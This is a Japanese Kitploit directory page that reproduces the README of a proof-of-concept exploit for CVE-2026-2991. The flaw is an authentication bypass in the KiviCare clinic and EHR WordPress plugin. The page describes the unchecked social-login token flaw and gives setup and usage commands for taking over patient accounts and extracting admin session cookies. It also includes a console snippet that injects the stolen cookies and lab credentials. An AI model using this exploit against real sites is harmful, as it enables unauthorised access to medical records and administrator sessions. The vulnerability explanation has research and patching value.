Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-2991 — CVE-2026-2991 の PoC エクスプロイト — KiviCare WordPress プラグイン (≤4.1.2) における認証バイパス。未認証の患者アカウント乗っ取りと管理者セッションの抽出を可能にします。 | Kitploit
ツール/GitHubGitHub/joshuavanderpoll/cve-2026-2991
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubjoshuavanderpoll/cve-2026-2991

CVE-2026-2991

CVE-2026-2991 の PoC エクスプロイト — KiviCare WordPress プラグイン (≤4.1.2) における認証バイパス。未認証の患者アカウント乗っ取りと管理者セッションの抽出を可能にします。

リポジトリを見る
265ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

KiviCare <= 4.1.2 - 認証バイパス(CVE-2026-2991)PoC

Python

📜 説明

CVE-2026-2991 は、KiviCare – Clinic & Patient Management System(EHR) WordPressプラグインの認証バイパス脆弱性であり、4.1.2 までのすべてのバージョンに影響します。

このプラグインは、ソーシャルログインでユーザーを認証する公開RESTエンドポイント /wp-json/kivicare/v1/auth/patient/social-login を公開しています。patientSocialLogin() 関数はメールアドレスとアクセストークンを受け入れますが、トークンを主張されたソーシャルプロバイダーに対して検証することはありません。認証されていない攻撃者は、メールアドレスと任意の文字列をトークンとして指定するだけで、登録済みの任意の患者としてログインできます。

さらに、WordPressの認証クッキーは、患者ロールチェックが施行される前に発行されます。つまり、非患者アカウント(管理者を含む)の場合、レスポンスはHTTP 403を返しますが、有効な Set-Cookie ヘッダーが含まれます — リプレイ可能な管理者セッションが攻撃者に漏えいします。

影響を受けるバージョン: kivicare-clinic-management-system <= 4.1.2

✨ 特徴

  • 認証不要 — 資格情報や事前のセッションは不要
  • 患者アカウント乗っ取り — メールアドレスのみで登録済みの任意の患者としてログイン
  • 管理者セッション漏えい — 非患者アカウントの場合、403レスポンスから有効な管理者認証クッキーを抽出
  • ブラウザコンソールスニペット — クッキーを注入してダッシュボードに直接リダイレクトする、貼り付け可能なJavaScriptを出力

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ 使用方法

root@kitploit:~
python3 CVE-2026-2991.py --url <TARGET_URL> --email <TARGET_EMAIL> [--login-type <google|apple>] [--timeout <SECONDS>] [--useragent <UA>]

患者アカウントの乗っ取り

登録済み患者の認証をバイパスします。スクリプトは、nonceとリプレイ可能なクッキーを含む完全なセッションを返します。

root@kitploit:~
python3 CVE-2026-2991.py --url 'https://target.com' --email '[email protected]'

患者バイパス


管理者セッション漏えい(非患者アカウント)

任意の非患者ユーザー(例: 管理者)のメールアドレスを指定します。エンドポイントはロールチェックの前に有効な認証クッキーを発行して403を返します — これらのクッキーが抽出されて表示されます。

root@kitploit:~
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email '[email protected]'

管理者クッキー漏えい


ブラウザコンソールでのログイン

実行が成功すると、スクリプトはJavaScriptスニペットを出力します。ブラウザで対象サイトを開き、スニペットをブラウザコンソール(F12 → Console)に貼り付けてEnterキーを押すと、盗んだクッキーを設定して自動的にダッシュボードへ移動します。

root@kitploit:~
(() => {
  document.cookie = "wordpress_<hash>=<value>; path=/";
  document.cookie = "wordpress_logged_in_<hash>=<value>; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();

🐋 Docker PoC

脆弱なプラグインがプリインストールされ、現実的なテストデータがシードされた自己完結型のDocker Compose環境です。 詳細は DOCKER.md を確認してください。

root@kitploit:~
cd docker/
docker compose up

このラボは、初回起動時に次のアカウントをシードします。

root@kitploit:~
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

🕵🏼 参考文献

  • KiviCare — WordPressプラグイン
  • NVD — CVE-2026-2991
  • WordFence
  • HackIndex.io — CVE-2026-2991

📢 免責事項

このツールは教育および研究目的でのみ提供されます。作成者は、このツールの誤用または損害について一切の責任を負いません。

ツールをダウンロード
役割ユーザー名メールパスワード
Adminadmin[email protected]admin
Doctordr.harris[email protected]Doctor@123
Doctordr.chen[email protected]Doctor@123
Doctordr.okonkwo[email protected]Doctor@123
Patientjames.ford[email protected]Patient@123
Patientsofia.reyes[email protected]Patient@123
Patientoliver.knight[email protected]Patient@123
Patientamara.diallo[email protected]Patient@123
Patientdan.walsh[email protected]Patient@123